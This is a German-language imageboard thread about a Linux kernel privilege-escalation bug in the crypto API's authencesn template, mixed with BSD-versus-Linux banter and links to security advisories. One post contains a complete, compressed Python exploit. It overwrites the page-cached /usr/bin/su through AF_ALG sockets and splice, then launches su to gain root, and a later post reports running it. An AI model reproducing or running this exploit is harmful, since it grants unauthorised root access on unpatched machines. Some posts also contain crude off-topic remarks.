Aussehen
Suche Einloggen
[c] [meta] [fefe] [erp]

/c/ – Pufferüberlauf

Antwort erstellen

(≤ 4)



[Zurück]
  • [l] /efef/ Felix Fri, 01 May 2026 10:26:44 GMT Nr. 162657
    __rida_tux_and_bs[…].jpg
    JPG 2048×1536 152.4k
    Aus der allseits beliebten Reihe "Mit BSD wäre das nicht passiert":

    https://arstechnica.com/security/2026/04/as-the-most-severe-linux-threat-in-years-surfaces-the-world-scrambles/
  • [l] Felix Fri, 01 May 2026 10:46:41 GMT Nr. 162659 
    #!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")


    Also so wild ist das jetzt auch nicht. BSD ist da im übrigen auch nicht besser oder sicherer, nur sagend.
  • [l] Felix Fri, 01 May 2026 10:47:24 GMT Nr. 162660
    Free BSD is da shit to me?
  • [l] Felix Fri, 01 May 2026 11:24:13 GMT Nr. 162662
    >The vulnerability stems from a “straight-line” logic flaw in the kernel’s crypto API.
    Färbe mich überrascht. Einen Haufen komplexe Kryptoroutinen in den Kernel verlagern und für den unprivilegierten Nutzer verfügbar machen, was kann schon schiefgehen???
  • [l] Felix Fri, 01 May 2026 11:25:39 GMT Nr. 162663
    Was das im Kernel verloren hat, hat Felix noch nie verstanden. Das kann doch eigentlich nur eine gezielt gepflanzte Hintertür sein.
  • [l] Felix Fri, 01 May 2026 11:34:39 GMT Nr. 162664
    Ich wichtige Frage an die Müratoren, könnten diese bitte das Bild ein wenig rotieren lassen?
    Also so richtig! Würde diese Schuhe gerne mal von hinten betrachten, zwecks Logs.
  • [l] ( ^◡^)っ✂❤ Felix Fri, 01 May 2026 12:10:42 GMT Nr. 162665 SÄGE
    Screenshot[…].png
    PNG 553×820 80.2k
    Ich hasse es Kinder zu beobachten, las mal Baden gehen.
  • [l] Felix Fri, 01 May 2026 12:13:49 GMT Nr. 162666
    eternal c.png
    PNG 387×550 339.8k
    >CopyFail gets its name because the authencesn AEAD template process (used for IPsec extended sequence numbers) doesn’t actually copy data when it should. Instead, it “uses the caller’s destination buffer as a scratch pad, scribbles 4 bytes past the legitimate output region, and never restores them,” Theori said. “The ‘copy’ of the AAD ESN bytes ‘fails’ to stay inside the destination buffer.”
    Klassiker.
  • [l] Felix Fri, 01 May 2026 15:14:45 GMT Nr. 162667
    >>162666
    Mit Rost wär... oh warte.

    >Canonical also commissioned a security audit recently of Rust Coreutils that turned up 44 CVEs and 113 issues in total.
    https://www.phoronix.com/news/Ubuntu-Rust-Coreutils-Audit
  • [l] Felix Sat, 02 May 2026 07:36:15 GMT Nr. 162670
    geil oder? Bezahlt mir endlich mal jemand die Token dafür?
  • [l] Felix Sat, 02 May 2026 10:24:16 GMT Nr. 162672
    >>162659
    >BSD ist da im übrigen auch nicht besser oder sicherer, nur sagend.
    Beleg?

    Spaßfakt: Selbst Android "ist da im übrigen besser und sicherer, nur sagend."
  • [l] Felix Sat, 02 May 2026 11:23:43 GMT Nr. 162673
    >>162659
    Felix fand amüsant, dass der Exploit an sich auf seiner veralteten Linux/aarch64-VM funktioniert hat, allerdings /bin/su im Page Cache mit einer x86_64-Binary überschrieben hat und daher nichts ausführen konnte.
    Ebenso laufen die Linux-Systeme auf Arbeit immer noch mit SLES 15, das standardmäßige Python 3.6 hat nicht einmal os.splice() als Frontend für den Syscall. War aber offenbar schon gepatcht, nachdem ich den Exploit in C umgeschrieben habe.

    >>162672
    FreeBSD hat dieses Jahr bereits zwei Lücken im Kernel geschlossen [0][1], die lokale Rechteausweitung ermöglicht haben, beides in bekannten Syscalls mit typischen C-Programmierfehlern. (Außerdem ein etwas komplizierterer Bug, mit dem ein Prozess ein 1-GB-Mapping als Page Table fehlinterpretieren und seine Speichermappings beliebig manipulieren konnte. [2])
    OpenBSD und NetBSD sind besser aufgrund von weniger Code und/oder paranoidere Implementation, haben aber im Zweifelsfall ähnlich peinliche Bugs. Vielleicht kann Felix dazu wieder den Security-Vortrag herauskramen.

    [0] https://www.freebsd.org/security/advisories/FreeBSD-SA-26:10.tty.asc
    [1] https://www.freebsd.org/security/advisories/FreeBSD-SA-26:13.exec.asc
    [2] https://www.freebsd.org/security/advisories/FreeBSD-SA-26:11.amd64.asc
[Zurück]
[c] [meta] [fefe] [erp]
Proudly made without AI, Blockchain, Kubernetes, Docker, PHP, Java, Perl, MySQL, Postgres, MongoDB and Node.js.
Quellcode